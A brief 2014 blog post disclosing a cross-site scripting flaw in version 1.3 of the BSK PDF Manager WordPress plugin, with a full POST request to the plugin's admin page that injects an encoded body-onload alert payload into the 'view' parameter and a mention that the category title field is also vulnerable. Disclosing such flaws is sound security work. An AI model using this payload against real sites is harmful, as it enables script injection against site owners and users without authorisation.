Wednesday, 26 February 2014

[EN] XSS in BSK PDF Manager

# ==============================================================
# Title ...| XSS in BSK PDF Manager
# Version .| bsk-pdf-manager 1.3
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/admin.php?page=bsk-pdf-manager&view=addnew HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 302

page=bsk-pdf-manager&view='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&cat_title=asdasd&bsk_pdf_manager_action=category_save&bsk_pdf_manager_category_id=-1&bsk_pdf_manager_category_save_oper_nonce=9977a95481&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dbsk-pdf-manager%26view%3Daddnew
---<request>---

Also vulnerable is 'category->title'.

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

No comments:

Post a Comment

What do You think...?